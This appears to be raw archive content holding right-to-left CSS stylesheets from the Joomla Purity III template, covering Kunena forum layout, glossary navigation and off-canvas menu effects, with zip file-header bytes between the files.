  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #cc0000;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-left: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-left: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-right: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: right;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: right;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #800000;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-right: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 0 0 12px;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #800000;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-left: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #800000;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #800000;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-left: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: right;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-right: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  right: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #cc0000;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 40px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-left: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-right: 0;
    margin-left: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-right: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-right: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-right: 20px;
    padding-left: 20px;
    margin-right: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 0 10px 10px;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #cc0000;
  color: #cc0000;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-left: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #cc0000;
  border: 1px solid #cc0000;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: right;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-right: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: right;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  display: table;
  content: " ";
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-left: 5px;
  margin-bottom: 10px;
  float: right;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: left;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-left: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-left: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-right: 1px solid #eeeeee;
  margin-right: -1px;
  padding-right: 20px;
  padding-left: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: left;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  display: table;
  content: " ";
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-right: 10px;
  padding-left: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .wysibb-toolbar {
  min-height: 34px;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-left: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #cc0000;
  color: #cc0000;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #cc0000;
  border-color: #cc0000;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  display: table;
  content: " ";
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: right;
}
#kunena.layout ul.pagination li + li {
  border-right: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  filter: alpha(opacity=40);
  opacity: 0.4;
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-right: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}
.view-topic body.modal-open {
  overflow: auto;
}
.com_kunena #t3-mainnav {
  padding: 0;
}
.com_kunena #t3-mainnav .t3-navbar {
  display: inline-block;
  flex: 1;
}
.com_kunena .t3-megamenu .navbar-nav {
  flex-direction: row;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-menu {
  position: absolute;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-toggle::after {
  display: none;
}
.com_kunena .tab-pane.show {
  opacity: 1;
}PKӜ�\��&�rr1purity_iii/css/rtl/red/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: right;
  margin: 0 0 10px 1px;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #cc0000;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
  background: #f7f7f7;
  color: #222222;
  font-weight: 600;
  font-size: 35px;
  margin: 0 0 20px;
  padding: 15px;
  text-transform: uppercase;
}
.glossary-group-items ul {
  padding: 0;
  margin: 0;
}
.glossary-group-items ul > li {
  list-style: none;
  padding: 0;
}
.glossary-group-items ul > li > a {
  color: #444444;
  display: block;
  font-size: 18px;
  padding: 5px 15px;
}
.glossary-group-items ul > li > a:hover,
.glossary-group-items ul > li > a:active,
.glossary-group-items ul > li > a:focus {
  color: #cc0000;
  text-decoration: none;
}PKӜ�\	Sl�Q�Q%purity_iii/css/rtl/red/off-canvas.cssnu&1i�.off-canvas-toggle {
  z-index: 100;
}
html,
body {
  height: 100%;
}
.noscroll {
  position: fixed;
  overflow-y: scroll;
  width: 100%;
}
.t3-wrapper {
  background: #ffffff;
  position: relative;
  right: 0;
  z-index: 99;
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  overflow: visible;
}
.t3-wrapper::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 0;
  height: 0;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  z-index: 100;
}
.t3-mainnav-android {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .t3-wrapper::after {
  width: 100%;
  height: 10000px;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-open .t3-mainnav-android::after {
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.t3-off-canvas {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 100;
  visibility: hidden;
  width: 250px;
  height: 100%;
  overflow: hidden;
  -webkit-transition: all 0.5s;
  transition: all 0.5s;
}
.t3-off-canvas::after {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.2);
  content: '';
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.off-canvas-right.t3-off-canvas {
  display: none;
}
.off-canvas-right .off-canvas-right.t3-off-canvas {
  display: block;
}
html[dir="ltr"] .off-canvas-right.t3-off-canvas {
  right: auto;
  left: 0;
}
.off-canvas-open .t3-off-canvas::after {
  width: 0;
  height: 0;
  opacity: 0;
  -webkit-transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
  transition: opacity 0.5s, width 0.1s 0.5s, height 0.1s 0.5s;
}
.off-canvas-open .off-canvas-current {
  visibility: visible;
}
.off-canvas-open .t3-off-canvas {
  overflow-y: auto;
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 6px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #cc0000;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #800000;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .dropdown-menu {
  position: static;
  float: none;
  display: block;
  width: 100%;
  padding: 0;
  border: 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-1.off-canvas-open .off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-1.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-1.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-2.t3-off-canvas {
  z-index: 1;
}
.off-canvas-effect-2.off-canvas-open .off-canvas-effect-2.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-2.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-2.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-3.off-canvas-open .off-canvas-effect-3.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
}
.off-canvas-effect-3.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-3.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-3.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
.off-canvas-effect-4.off-canvas-open .off-canvas-effect-4.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-4.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-wrapper,
.off-canvas-right.off-canvas-effect-4.off-canvas-open .t3-mainnav-android {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-4.t3-off-canvas {
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(50%, 0, 0);
  transform: translate3d(50%, 0, 0);
}
.off-canvas-effect-5.off-canvas-open .off-canvas-effect-5.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-5.t3-off-canvas {
  z-index: 1;
  -webkit-transform: translate3d(-50%, 0, 0);
  transform: translate3d(-50%, 0, 0);
}
body.off-canvas-effect-6 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-6 .t3-wrapper {
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
  height: auto;
  overflow: hidden;
}
.off-canvas-effect-6.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0) rotateY(-15deg);
  transform: translate3d(250px, 0, 0) rotateY(-15deg);
}
.off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-6.off-canvas-open .off-canvas-effect-6.t3-off-canvas {
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
